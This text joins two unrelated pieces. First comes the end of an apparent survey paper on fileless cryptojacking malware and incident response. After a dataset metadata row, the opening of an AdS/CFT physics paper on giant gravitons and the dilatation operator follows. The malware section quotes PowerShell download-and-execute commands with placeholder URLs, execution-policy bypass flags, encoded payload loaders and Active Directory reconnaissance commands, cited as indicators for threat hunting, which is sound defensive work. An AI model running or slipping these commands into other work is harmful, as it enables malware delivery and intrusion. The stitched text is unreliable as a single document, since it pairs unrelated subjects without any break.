The other common technique is "dumping credentials" \cite{MitreDump}. In Windows, the Security Accounts Manager (SAM) database stores credentials with the "lsass.exe" process. SAM hive contains credentials of logged-in or created domain users and admins. Note that threat actors target admin credentials or special users such as help desk employees who have more privileges than regular users. After dumping credentials and obtaining password hashes, attackers can use the "Pass the Hash" technique \cite{Mitrepass} for authentication without a password. In the "Pass the Ticket" method, adversaries hijack an active directory domain controller and generate a new Kerberos golden ticket. The golden ticket can impersonate any accounts on the domain, which gives an indefinite privilege. Additionally, some open source tools such as Mimikatz can export cached plaintext passwords or authentication certifications from memory. Besides that, if attackers fail to get the passwords using these techniques above, they can use keyloggers on the compromised endpoint to obtain the passwords.
\subsection{Lateral Movement}
Lateral movement techniques can help threat actors to reach other endpoints, especially domain controllers and databases \cite{baldin2019best}. This provides an advantage in detection to the attackers because they can hide themselves in the other endpoints \cite{tian2019real}. Therefore, data exfiltration, ransomware, or cryptojacking can happen later, even after the first detection and incident response.
Common lateral movement activities start with reconnaissance in a victim environment. Legitimate network mapping tools can come with fileless malware such as adfind.exe that is commonly used to map the network of victim environment in fileless attacks \cite{adfind}, specifically in Cobalt Strike attacks \cite{tremdmicro2021}. It is observed that threat actors export usernames, endpoint names, subnets, as seen in the sample commands below that were run under a batch file \cite{adfind}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
adfind.exe -f (objectcategory=person)> ad\_users.txt
adfind.exe -f (objectcategory=computer)> ad\_comps.txt
adfind.exe -f (objectCategory-subnet)> subnets.txt
\end{minted}
}
\end{tcolorbox}
After mapping a network and determining the valuable assets, attackers can laterally move on the network using the credentials obtained in the privilege escalation phase \cite{tian2019real}. Besides, attackers can also exploit the very well-known EternalBlue SMB vulnerability, which allows computers with Windows operating system to propagate information to other systems on the same network \cite{nakashima2017nsa}.
\subsection{Command and Control (C2 Server Connection)}
After all phases above, attackers can control some or all endpoints using C2s for remote command execution. Some adversaries may use remote desktop applications with direct GUI control in a victim network. Attackers can stay in a victim network to conduct ransomware or cryptojacking, sometimes for weeks.
\section{Background of Cryptojacking (Coinminer Malware)}
Cryptojacking is the unauthorized use of a computing device to mine cryptocurrency \cite{Hong2018,varlioglu2020cryptojacking, Eskandari2018}.
There are three types of cryptojacking attacks: in-browser Cryptojacking, in--host Cryptojacking, and in-memory Fileless Cryptojacking.
\subsection{In-browser Cryptojacking:}
In this technique, cryptojackers embed their malicious codes into a web page to perform mining. It is also called drive-by cryptojacking that can affect even mobile devices with trojans hidden in downloaded apps \cite{malwarebytes2021crypto}. Moreover, attackers can attempt to inject those scripts with an obfuscated shape into a compromised website that is actually known as a trusted source \cite{tahir2019browsers}. Since Cryptojacking can become profitable when a user remains on a website longer than 5.53 minutes \cite{Papadopoulos2019}, the mining scripts are primarily observed in free movie or gaming websites. Furthermore, with the WebSocket, WebAssembly \cite{hilbig2021empirical}, and WebWorker technology, the connection can be more robust to increase the mining ability \cite{varlioglu2020cryptojacking}.
Coinhive was a company that provided a script code to enable website owners to mine the Monero cryptocurrency \cite{monero} after 2017. It was widely exploited and injected into websites within a few months \cite{Musch2018}. 81\% of cryptojacking websites use scripts provided by Coinhive between 2017 and 2019 \cite{Saad2018}. Symantec reported that Coinhive's script "statdynamic.com/lib/crypta.js" was even found in the Microsoft Store \cite{Guo2019}. On March 8, 2019, Coinhive stopped its service, and unauthorized in-browser cryptojacking activities decreased significantly with 99\% percent in the first quarter of 2020 \cite{varlioglu2020cryptojacking}. However, Symantec reported that in-browser cryptojacking increased by 163\% after the second quarter of 2020 \cite{Symantec2020c}.
\subsection{In-host Cryptojacking:}
Cryptojacking can run as a traditional malware in a victim endpoint. For example, an attachment of a phishing email can infect a computer by loading crypto mining code directly into the disk \cite{trendmicro2019c}.
\subsection{In-memory Fileless Cryptojacking:}
The memory-based cryptojacking runs on the fileless threat techniques such as all-memory-only exploiting the WMI or PowerShell tools for execution \cite{handaya2020machine}. It also uses registry-resides persistent techniques. It is more dangerous than in-browser and in-host cryptojacking attacks because its evasion and persistent techniques are more sophisticated \cite{handaya2020machine}. Since fileless threats can allow attackers to have command and control abilities with backdoors \cite{moussaileb2021survey}, a fileless cryptojacking can be converted to a ransomware attack. This threat is examined in Section~\ref{sectionNewTrend}.
\section{New Trend: Fileless Cryptojacking Malware}\label{sectionNewTrend}
As shown in Fig.~\ref{fig3}, similar to the fileless ransomware attacks \cite{moussaileb2021survey}, cryptojackers use open-source attack frameworks (Phase 1) to deliver malicious scripts using phishing emails or vulnerability exploitations (Phase 2) and leverage open source security tools such as Mimikatz and exploit legitimate tools like PowerShell, WMI subscriptions, Microsoft Macros to execute the payload on memory (Phase 3) and create scheduled tasks for persistent mechanism (Phase 4) with continues download processes of malicious scripts\cite{sophos2019c}. Attackers want a malicious connection to remain to spread throughout the network by escalating privileges (Phase 5) and exploiting the common vulnerabilities such as the use of EternalBlue SMB vulnerability \cite{nakashima2017nsa} or RDP brute-forcing (Phase 6). This provides the cryptojackers large pools of CPU resources (Phase 7) in victim enterprises for efficient cryptocurrency mining slaves (Phase 8) \cite{sophos2019c} to gain illicit profit with cryptocurrencies (Phase 9).
\begin{figure}
\centering
\includegraphics[width=1.00\linewidth]{figure2.png}
\caption{Fileless cryptojaking malware workflow.}
\label{fig3}
\end{figure}
A fileless cryptojacking attack can be started with phishing emails, zero-day vulnerability exploitations, hidden scripts of malicious websites~\cite{trendmicro2019b}. PowerShell commands connecting malicious payload sources are observed as seen in a sample command below:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
PowerShell.exe -nop -exec bypass -c
"IEX (New-Object Net.WebClient).DownloadString(<URL>)"
\end{minted}
}
\end{tcolorbox}
Cryptojackers exploit Powershell to execute malicious commands remotely straight in memory to bypass antivirus systems. Also, they can encode these commands using Base64 which is a binary-to-text encoding technique in a sequence of 8-bit bytes such as the sample command below \cite{Purple3}.
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -nop -exec bypass -Enc
<Base-64 encoded script>
\end{minted}
}
\end{tcolorbox}
After infections, the endpoints send reports of the status of the connection and mining activity to the Command \& Control servers (C2) of attackers. Attackers can also run remote commands for other purposes such as data exfiltration or ransomware. This is another dangerous face of the fileless cryptojacking compared with traditional cryptojacking techniques. Lateral movement routines are observed for spreading in victim networks \cite{Powershell1}. As a fileless threat pattern, fileless cryptojacking also uses scheduled tasks or registry keys such as "Run" or "RunOnce" for malware propagation. Also, cryptojackers can store PowerShell commands under scheduled tasks and registry keys. System information is important to run cryptojacking scripts. Thus the commands can collect computer names, GUIDs, MAC addresses, OS, and timestamp information. In the final stage, victim endpoints become slaves of mining deployers or mining pools for the illicit gains of cryptojackers.
\subsection{Common Fileless Cryptojacking Malware in the Wild}
\subsubsection{Purple Fox}
It is originally known as a fileless downloader malware leaving small footprints to avoid detections. It is also widely used for fileless cryptojacking delivering mining scripts as well as ransomware purposes. It can be delivered using a vulnerability exploitation or a malicious webpage that stores HTML application (.hta) files that trigger PowerShell to run and execute Purple Fox fileless backdoor trojan \cite{Purple1, Purple2}. In a common way, the trojan shows itself as an image (.png) file that exploits the MsiMake parameter of PowerShell to run msi.dll to execute Purple Fox malware \cite{Purple1}. The sample observed PowerShell scripts\cite{Tweetpurple, Purple1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -c "iex((new-object Net.WebClient).
DownloadString(<URL>))"
\end{minted}
}
\end{tcolorbox}
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
-nop -exec bypass -c "IEX (New-Object Net.WebClient).
DownloadString(<Domain1>/Png1.PNG);
MsiMake <Domain2>/Png2.PNG>)"
\end{minted}
}
\end{tcolorbox}
Purple Fox also can attempt to elevate privileges, move in a victim network conducting automatic SMB brute-force attacks (on 445,135,139 ports) \cite{Purple2} by scanning randomly generated IP blocks as seen in a sample IoC below:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
netsh.exe ipsec static add filter filterlist=Filter1
srcaddr=any dstaddr=Me dstport=445 protocol=UDP
\end{minted}
}
\end{tcolorbox}
To remain operational even after rebooting, it can create persistent mechanisms by using PowerSploit that is an open-source penetration testing tool \cite{PowerSploit}.
\subsubsection{GhostMiner}
It is a powerful fileless cryptojacking \cite{block2019windows}, observed in 2018, with the high-level evasion techniques \cite{caldwell2018miners}. GhostMiner exploits WMI objects as a fileless threat routine for a persistent mechanism \cite{GhostMiner1} to mine Monero cryptocurrency (XMR) continuously.
It creates a WMI event filter to deploy the persistent mechanism and install a a WMI class named “PowerShell\_Command” \cite{GhostMiner1}. The malicious WMI class stores Base64 encoded commands as seen below \cite{GhostMiner1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
-NoP -NonI -EP ByPass -W Hidden -E <Base64 encoded script>
\end{minted}
}
\end{tcolorbox}
Furthermore, it disables other crytojacking activities like PCASTLE in victim endpoints to use resources at a maximum level \cite{GhostMiner1}.
\subsubsection{Lemon Duck}
It first appeared in 2019 with an effective lateral moving capability in victim networks exploiting EternalBlue SMB vulnerability \cite{Lemon1}. Lemon Duck can infect Linux operating systems and IoT devices as well \cite{palmer2021successful}. It also uses Mimikatz to dump credentials, adfind.exe to scan active directory, and attempts many other techniques such as task scheduling, registry exploitation, WMI subscriptions for persistent mechanism \cite{lemon2}.
Below, there is a sample Lemon Duck powershell command that also has a 'bpu' function.
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -w hidden IEX(New-Object Net.WebClient).
DownloadString(<URL1>); bpu (<URL2>)
\end{minted}
}
\end{tcolorbox}
The "bpu" function is used a wrapper to download and execute payloads while disabling Windows Defender real-time detection in a Lemon Duck crypto mining activity \cite{lemon3}.
\subsubsection{PCASTLE}
PCASTLE is similar to the other fileless crytojackings with abusing PowerShell to hijack the legitimate processes and exploit EternalBlue SMB vulnerability to mine. When it moves in a victim network for propagation, a scheduled task or RunOnce registry key is executed to download the PowerShell script that will access another URL to download the actual malicious payload and build a Command and Control connection \cite{PCASTLE1}. It uses the open-source Invoke-ReflectivePEInjection tool \cite{Invoke} to inject itself into the memory of the Powershell process as seen in the compressed Base64 encoded command below\cite{PCASTLE1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=-12pt]{python}
Invoke-Expression \$(New-Object IO.StreamReader
(\$(New-Object IO.Compression.DelfateStream
(\&(New-Object IO.MemoryStream
(,\$([Convert]::FromBase64String(‘<Base64 encoded code>’)))),
[IO.Copression.CompressionMode]::Decompress)),
[Text.Encoding]::ASCII)).ReadToEnd();
\end{minted}
}
\end{tcolorbox}
\subsubsection{WannaMine}
WannaMine uses WannaCry’s exploitation code, and exploits “EternalBlue” SMB vulnerability \cite{nakashima2017nsa} to drop and propagate mining malware \cite{wannamine}. It behaves under fileless techniques, called all-in-memory malware, by hijacking Windows legitimate processes and exploiting PowerShell and WMI tools.
\section{Digital Forensics and Incident Response (DFIR) on Fileless Cryptojacking Malware}
\begin{table*}[h]
\caption{A threat hunting-oriented DFIR approach for fileless cryptojacking attacks.}
\begin{center}
\begin{tabular}{ l l }
\hline
\textbf{Phase}& \textbf{Action}
\\ \hline
Threat Intelligence & Collect IoCs and TTPs (IP, Domain, URL, Hash, Command, Tool)\\
Threat Hunting & Search and Find the IoCs and TTPs on Endpoints or Network Traffic\\
Isolation (1) & Cut the Network Traffic on Detected Endpoint/s\\
Identification (1) & Validate whether the Detection is True Positive\\
Identification (2) & Find the C2 Connections or Cryptominer Processes or Connections to Mining Pools\\
Identification (3) & Check Firewall whether the C2 Connections or Mining Connections Exist in the Other Endpoints\\
Isolation (2) & Cut the Network Traffic on Detected Endpoint/s by Firewall C2 Filter\\
Identification (4) & Find New C2 Connections on New Detected Endpoints and > Isolation (2) \\
Identification (5) & Find the Patient Zero (Entry Point)\\
Containment & Block All Detected Malicious Connections and Hash Values Isolating the Affected Endpoints\\
Evidence Acquisition & Acquire Sample Network Traffic Capture; Memory Image; Registry Dump; Event Logs; New Files, Master File Table (MFT)\\
Evidence Preservation & Generate the Hash Values of Collected Files with Timestamps\\
Eradication & Destroy Malicious Artifacts and Persistent Mechanism \\
Identification (6) & Find Persistent Mechanism If Endpoints still Attempt to Connect C2 or Mining Pool\\
Remediation & Patch The Vulnerability If the Entry Point Experienced an Exploitation, Erase Other Leftovers\\
Evidence Examination & Analyze PowerShell Logs, Event Logs, SMB Logs; Registry Keys; Memory Timeline; New Files, Master File Table (MFT)\\
Report & Write a Report to Present Results and Improve Security Posture\\
Feed & Convert Collected Information to Threat Intelligence and Threat Hunting Actions in the DFIR Cycle\\
\hline
\end{tabular}
\label{table1}
\end{center}
\end{table*}
As fileless threats are increasing, in-host detections are getting important that DFIR interventions are considered with threat intelligence and hunting in today's world. Detecting and blocking C2 connections require strong behavior monitoring capabilities or continuous threat intelligence feed to conduct effective threat hunting, especially in big organizations.
Threat intelligence and hunting reports show that \cite{Purple1, Purple2, GhostMiner1, Lemon1, PCASTLE1}, the patterns on PowerShell commands and hijacked calling-out processes appear effective detection elements. Thus, auditing "Process Creations" and "Command Line" activities \cite{Microsoft1} can increase visibility \cite{sumologic1}. Especially, auditing PowerShell commands and setting up specific rules against specific encoded or decoded commands can improve detection mechanisms against fileless cryptojacking attacks.
As displayed in Table~\ref{table1}, we propose a new DFIR approach combining threat intelligence and hunting steps to recategorize the actions in a specific way for fileless cryptojacking. It can also be applied to fileless ransomware threats accordance with the techniques that proposed in the literature \cite{shin2021twiti}, \cite{mansfield2017fileless}, \cite{bucevschi2019preventing}, \cite{bahrami2019cyber}, \cite{kumar2020emerging}, \cite{boranaassistive}, \cite{handaya2020machine}.
As a traditional expectation in an intrusion, an incident responder's goal is to identify C2 connections, explore the scope of the attack, and find the entry point (patient zero) at first. However, the action can be more proactive by taking the response back to threat hunting and threat intelligence steps. Specifically, threat hunting on the initial access is crucial. Besides, threat hunting on the publicly available servers is another important point because exploited zero-day vulnerabilities such as Log4J (CVE-2021-44228) can allow adversaries to run their scripts for cryptojaking or ransomware. Moreover, the attackers can directly access the internal network if a vulnerable endpoint is not in the DMZ (Demilitarized Zone). This can cause an easier lateral movement inside of the victim organization network.
Threat hunting against fileless threats should cover common exploited legitimate tools such as adfind.exe, psexec.exe, nmap, certutil, bitsadmin, or base64-encoded/decoded PowerShell commands. As an example, these parts of the commands below are commonly used in fileless malware attacks under Cobalt Strike attack framework\cite{slowik2018anatomy,bahrami2019cyber}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=0pt]{python}
powershell.exe -nop -w hidden -encodedcommand JABz...
\end{minted}
}
\end{tcolorbox}
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=0pt]{python}
powershell.exe -nop -w hidden -c
"IEX ((new-object net.webclient).DownloadString(<C2>))"
\end{minted}
}
\end{tcolorbox}
It is very useful to merge threat hunting and DFIR with threat intelligence. Especially, Twitter is appearing as a more dynamic and prompt interactive platform for it \cite{shin2021twiti}. Especially individual threat hunters feed the threat intelligence research with invaluable information. Our new "Threat Hunting-oriented DFIR approach" is a cycle that it has been created to meet new (IR) Incident Response needs from a digital forensics perspective as shown in Table~\ref{table1}.
\section{Conclusion}
In this paper, we first conducted a comprehensive literature review of academic articles and industry reports on the new "Fileless Cryptojacking" threat. Our results show that all in-memory fileless Cryptojacking is not as investigated as in-browser or in-host cryptojacking. This article attempts to provide a deep understanding of this problem. Also, we review the fundamentals of the fileless threat that can help ransomware researchers because ransomware and cryptojacking are the most common threats in the wild and have similar patterns (Tactics, Techniques, and Procedures - TTPs). As a fileless threat routine, all in-memory cryptojacking and ransomware attacks reside only in memory (RAM) and run malicious scripts under legitimate processes in the Windows operating system by creating persistent mechanisms and performing lateral movements with PowerShell commands, WMI objects, scheduler tasks, and registry key. In this context, this paper presents a new threat hunting-oriented DFIR approach with detailed phases. These can also help cybersecurity professionals who conduct digital forensics and incident response against fileless threats.
\bibliographystyle{IEEEtran}
| 2024-02-18T23:40:18.741Z | 2022-03-10T02:15:45.000Z | algebraic_stack_train_0000 | 2,023 | 5,052 |
|
proofpile-arXiv_065-9894 | \section{Introduction}
The AdS/CFT correspondence \cite{1999TheLargeN,1998Gaugetheory,witten1998anti} claims an exact duality between ${\cal N}=4$ super Yang-Mills theory and string theory on spacetimes that are asymptotically AdS$_5\times$S$^5$. The correspondence can be used to show that states in the string theory correspond to operators in the Yang-Mills theory, and the converse. In this article we are interested in operators that have a bare dimension of order $N$ and correspond to giant graviton branes in the dual string theory \cite{2000Invasion,2000SUSY,2000Largebranes}. Giant gravitons are spherical branes that carry a D3-brane dipole charge. As usual, to construct excited D-brane states, we attach open strings to the brane. At low energy these open strings should be described by a Yang-Mills theory, so that the low energy dynamics of these operators should be described by an emergent Yang-Mill theory\cite{2005DbranesInYangMills}. Our goal is to study the one loop dilatation operator acting on the operators dual to giant graviton branes, in order to test this idea. This was performed in the leading large $N$ limit in \cite{2020EmergentYangMills}. The result matches a free emergent Yang-Mills theory associated with the brane world volume dynamics. Our goal in this paper is to compute the first ${1\over N}$ correction, in order to learn about interactions.
The Study on the action of the dilatation operator, at large $N$, for operators with a dimension of order $N$ is highly nontrivial \cite{2002GiantGravitons}. The large $N$ limit is usually dominated by planar diagrams, and higher genus ribbon graphs are suppressed\cite{1974Aplanardiagram}. However, for operators of dimension of order $N$, the combinatorics of the Feynman diagrams can be used to show that the sheer number of non-planar diagrams overpowers the higher genus suppression. The usual simplifications for large $N$ do not hold and new ideas are needed. We will follow the approach to this problem based on representation theory, developed in \cite{corley2002exact,2007GiantgravitonsI,2008ExactMultiMatrix,2007BranesAntiBranes,2008DiagonalMultiMatrix,2009DiagonalFreeField,2008EnhancedSymmetries,2008ExactMultiRestrictedSchur}. These works developed bases spanning the space of the local gauge invariant operators of the model, that diagonalize two point functions in the free field theory exactly (i.e. to all orders in ${1\over N}$), while at low loop order these operators mix only weakly . Specifically, we will use the basis provided by the restricted Schur polynomials \cite{2008ExactMultiMatrix}.
Our approach entails evaluating the exact (to all orders in ${1\over N}$) action for the one loop dilatation operator and then expanding to extract the leading term and the first subleading correction. Even with the powerful representation theory methods, this is a problem of considerable complexity, so that we will focus on a system of two giant gravitons. This corresponds to studying restricted Schur polynomials labeled by Young diagrams with two long columns. Since it plays a central role in our analysis, we briefly review the derivation of how the dilatation operator acts on the restricted Schur polynomials in Section \ref{Dact}. The leading large $N$ dilatation operator can be diagonalized analytically, with the eigenstates known as ``Guass graph operators''. The construction of the Gauss graph operators is reviewed in section
\ref{GGBasis}. In Section \ref{emergentYM} we explain the identification of the Gauss graph operators with states in the Hilbert space of an emergent Yang-Mills theory. The discussion at this point has all dealt with the leading contribution in a ${1\over N}$ expansion, which reproduces the free emergent Yang-Mills theory. Having set the stage, we are now ready to turn to evaluate the first subleading corrections, which represent interactions in the emergent Yang-Mills. To do this we calculate the exact action of the one loop dilatation operator in Section \ref{analyticsubleading}. Our computation involves three complex scalars and so is a generalization of similar computations presented in \cite{2010Emergentthree,2011Surprisingly}. This generalization is necessary as the operator mixing corresponding to interactions in the emergent Yang-Mills is not captured by the study in \cite{2010Emergentthree,2011Surprisingly}. Our final result for the interaction is in Section \ref{sbldin}. This is the key result of this paper. Conclusions and discussion are given in Section \ref{discuss}.
The physics of how open strings and their dynamics emerges from ${\cal N}=4$ super Yang-Mills theory is a fascinating subject and there are by now many papers on this topic. We recommend \cite{2005QuantizingOpenSpin,2013OpenSpinChains,2015GiantGravitonsAndTheEmergence,berenstein2015central,2015ExcitedStates,berenstein2020open,2021OpenGiantMagnons,2022arXiv220211729B} and their references, for background.
\section{Action of the Dilatation Operator in Restricted Schur Polynomials basis}\label{Dact}
In this section we review the exact\footnote{i.e. to all orders in $1/N$.} action of the one loop dilatation operator on restricted Schur polynomials in the $SU(3)$ sector of $\mathcal{N}=4$ super Yang-Mills theory. The one loop dilatation operator \cite{2003TheBetheAnsatz} in this case reads
\begin{equation}
D=-\frac{2g_{YM}^2}{(4\pi)^2}\left([\phi_3,\phi_1][\partial_{\phi_{3}},\partial_{\phi_{1}}]+[\phi_{2},\phi_{1}][\partial_{\phi_{2}},\partial_{\phi_{1}}]+[\phi_{3},\phi_{2}][\partial_{\phi_{3}},\partial_{\phi_{2}}]\right)
\end{equation}
For convenience, we introduce the notation ($A,B=1,2,3$)
\begin{equation}
D\equiv -\frac{2g_{YM}^2}{(4\pi)^2} \sum_{A>B=1}^{3} D_{AB}
\end{equation}
where $D_{AB}$ mixes fields $\phi_A$ and $\phi_B$. We will consider the action of this dilatation operator on the restricted Schur polynomials\cite{2013JHEP...03..173D}
\begin{equation}
\begin{aligned}
\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)&=\frac{1}{n_1 ! n_2 ! n_3 !}\sum_{\sigma \in S_{n_T}}\chi_{R(\vec{r})\vec{\mu}\vec{\nu}}(\sigma) \operatorname{Tr}\left(\sigma \phi_1^{\otimes n_1} \phi_2^{\otimes n_2} \phi_3^{\otimes n_3} \right)
\end{aligned}
\end{equation}
where $n_T=n_1+n_2+n_3$ and
\begin{equation}
\begin{aligned}
\operatorname{Tr}\left(\sigma \phi_1^{\otimes n_1} \phi_2^{\otimes n_2} \phi_3^{\otimes n_3} \right)=(\phi_1)_{i_{\sigma(1)}}^{i_1}\cdots (\phi_1)_{i_{\sigma(n_1)}}^{i_{n_1}}(\phi_2)_{i_{\sigma(n_1+1)}}^{i_{n_1+1}}\cdots (\phi_2)_{i_{\sigma(n_1+n_2)}}^{i_{n_1+n_2}}\\
\times (\phi_3)_{i_{\sigma(n_1+n_2+1)}}^{i_{n_1+n_2+1}}\cdots (\phi_3)_{i_{\sigma(n_1+n_2+n_3)}}^{i_{n_1+n_2+n_3}}
\end{aligned}
\end{equation}
The restricted Schur polynomials are labeled by representations and multiplicity labels. $R$ denotes an irreducible representation of $S_{n_{T}}$, labeled by a Young diagram with $n_T$ boxes. We have $\vec{r}=(r_1,r_2,r_3)$, where $r_A$ is a Young diagram with $n_A$ boxes, and $n_1+n_2+n_3=n_T$. Together these three Young diagrams label an irreducible representation of $S_{n_1}\times S_{n_2}\times S_{n_3}$ which is a subgroup of $S_{n_{T}}$. We know the operator should be invariant under swapping bosons $\phi_A$. The only way to realize this is to make the row and column indices of $\phi_A$ transform in the identical representation $r_A$ and then project onto an uniquely trivial representation in $r_A\otimes r_A$. Further we have $\vec{\mu}=(\mu_2,\mu_3)$ and $\vec{\nu}=(\nu_1,\nu_2)$, where $\mu_A$ and $\nu_A$ specifies the multiplicity of $r_A$ as a subspace of the carrier space of $R$. \ At this point we are forced to introduce multiplicities because the representation of the subgroup may appear more than once. We remove $n_2$ boxes from $R$, and assemble them into $r_2$. There might be more than one way to do this, while they bring us into different copies of the carrier space of $r_2$. We distinguish different copies using $\mu_2$ (or $\nu_2$). Similarly, removing $n_3$ boxes from $R$ we might find different copies of $r_3$, and we use $\mu_3$ (or $\nu_3$) to distinguish them. Finally the remaining boxes in $R$ compose the Young diagram labeling $r_1$ so that no multiplicity label is needed for it.
$\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}(\sigma)$ is a restricted character\cite{2007Giantgravitons}, obtained by summing over the row index of $\Gamma^{R}(\sigma)$ over the subspace $(\vec{r})\vec{\mu}$ and the column index over the subspace $(\vec{r})\vec{\nu}$ which both arise upon restricting $R$ of $S_{n_{T}}$ to its $S_{n_1}\times S_{n_2}\times S_{n_3}$ subgroup, as explained above. It is useful to write
\begin{equation}
\chi_{R,(\vec{r}) \vec{\mu} \vec{\nu}}(\sigma)=\operatorname{Tr}_{R}\left(P_{R,(\vec{r}) \vec{\mu} \vec{\nu}} \Gamma^{(R)}(\sigma)\right)
\end{equation}
The trace is over the carrier space of irreducible representation $R$. The operator $P_{R,(\vec{r})\vec{\mu}\vec{\nu}}$ is an intertwining map. In the above trace, it makes the row indices of $\Gamma^{R}(\sigma)$ over the copy of $(\vec{r})$ labeled by $\vec{\nu}$ and the column indices over the copy of $\vec{r}$ labeled by $\vec{\mu}$.
For convenience we will use the restricted Schur polynomials normalized to have a unit two point function. The normalized operator $O_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)$ is defined by
\begin{equation}
\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\sigma\right)=\sqrt{\frac{f_{R}\text{hooks}_{R}}{\prod_{A}\text{hooks}_{r_A}}}O_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\sigma\right)
\end{equation}
We will show the action of dilatation operator on normalized restricted Schur polynomials in what follows. It is useful to introduce the short hand
\begin{equation}
\begin{array}{ll}
1_{\phi_{1}}=n_2+n_3+1 & n_{\phi_{1}}=n_1+n_2+n_3=n_{T} \\
1_{\phi_{2}}=n_{1}+1 & n_{\phi_{2}}=n_{1}+n_{2} \\
1_{\phi_{3}}=1 & n_{\phi_{3}}=n_{1} \\
\end{array}
\end{equation}
We also simplify $1_{\phi_{A}}$ as $1_{A}$. Note that $n_{\phi_A}$ and $n_{A}$ are distinct and should not be confused. Now the action of the dilatation operator\cite{2020EmergentYangMills} reads
\begin{equation}
\begin{aligned}
D O_{R(\vec{r})\vec{\mu}\vec{\nu}}=-\frac{2g^2_{YM}}{(4\pi)^2}\sum_{A>B=1}^{3}\sum_{T(\vec{t})\vec{\alpha}\vec{\beta}}(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}O_{T(\vec{t})\vec{\beta}\vec{\alpha}}
\end{aligned}\label{dilone}
\end{equation}
\begin{equation}\label{action on restricted Schur's}
\begin{aligned}
(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}&=\sum_{R',T'}\sqrt{c_{RR'}c_{TT'}}\sqrt{\frac{\text{hooks}_{\vec{r}} \text{hooks}_{\vec{t}}}{\text{hooks}_{R} \text{hooks}_{T}}}\frac{n_A n_B \sqrt{\text{hooks}_{R'} \text{hooks}_{T'}}}{n_1!n_2!n_3!}\\
\times&\text{Tr}_{R}\Big( \left[ \Gamma^R((1,1_A))P_{R(\vec{r})\vec{\mu}\vec{\nu}}\Gamma^R((1,1_A)),\Gamma^R((1,1_B))\right] I_{R'T'} \\
&\times \left[\Gamma^T((1,1_A))P_{T(\vec{t})\vec{\alpha}\vec{\beta}}^{\dagger}\Gamma^T((1,1_A)),\Gamma^T((1,1_B))\right] I_{T'R'}\Big)
\end{aligned}
\end{equation}
where $R'$ and $T'$ are irreducible representations of $S_{n_T-1}$ obtained by removing one box from $R$ and $T$ respectively. $I_{R'T'}$ is an interwiner from $T'$ to $R'$, i.e. we have $I_{R'T'}=0$ if $R'\neq T'$. One can refer to \cite{2020EmergentYangMills} for a detailed derivation.
They are the expressions defined by (\ref{dilone}) and (\ref{action on restricted Schur's}) that will in the end be used to define the Hamiltonian of the emergent gauge theory. To make the connection we need to study the dilatation operator in a basis that makes the connection to excited brane states most transparent. This basis, known as the Gauss graph basis, is introduced in the next section.
\section{Diagonalization in the Gauss Graph Basis}\label{GGBasis}
In this section we will diagonalize the dilatation operator in its $(\vec{r})\vec{\mu}$ indices, by moving to the Gauss graph basis. We will give a brief introduction to the Gauss graph basis. This involves defining the displaced corners limit at large $N$. Finally, we will prove that the conclusions given in \cite{2020EmergentYangMills}, obtained in the long rows case, also follow in the long columns case which we are considering. This is the first new result of this paper.
\subsection{Transforming to Gauss graph basis}
It is useful to begin with a motivation for the Gauss graph basis. We consider operators which have a definite semi-classical limit in the holographically dual theory, which allows us to simplify the large $N$ dynamics. In this paper we consider a system of $p$ giant gravitons, dual to operators labeled by Young diagram $R$ with $p$ long columns. We call this the long columns case, while the system of operators labeled by Young diagram with long rows is called the long rows case. The long rows case has been discussed in \cite{2020EmergentYangMills}.
We study the operators with a dimension $\Delta \sim N$, so that there should be $\sim N$ boxes in the Young diagram $R$ that labels the operator. To construct these operators, many $\phi_1$ fields and a few $\phi_2,\phi_3$ fields as excitations are used. Precisely, we assume $n_1 \sim N$ and $n_2\sim n_3\sim \sqrt{N}$.
These operators mix with each other only if the Young diagrams labeling them own the same amount of rows or columns. It has been argued that corners on the bottom of the Young diagram $R$ are well separated at large $N$ and weak coupling\cite{2020EmergentYangMills}. This is called the displaced corners limit, which simplifies the the action of the symmetric group on boxes at the corners: permutations just swap boxes they act on. Noticing that to obtain irreducible representations of the subgroup we remove and then reassemble boxes at corners, this simplication implies new symmetries and conservation laws \cite{2011GiantGravitonOscillators}. The new symmetry is swapping row or column indices of $\phi_A$ that belong to the same column. The new conservation law is that operators mix only if the numbers of boxes removed from each column to obtained the Young diagram $r_A$ are the same. This fact motivates the notation $\vec{n}_{A}=((n_{A})_{1},(n_{A})_{2},\dots,(n_{A})_{p})$ where $(n_A)_{i}$ tells us how many boxes are removed from the $i$th column of $R$ and then assembled into $r_A$. Using this notation the group representing the new symmetry is
\begin{equation}
H_{\vec{n}_{A}}=S_{(n_{A})_{1}}\times S_{(n_{A})_{2}}\times\cdots \times S_{(n_{A})_{p}}
\end{equation}
Both row and column indices of $\phi_A$ fields have this symmetry. Thus inequivalent operators constructed from the $\phi_{A}$ fields are specified by elements of the double coset
\begin{equation}
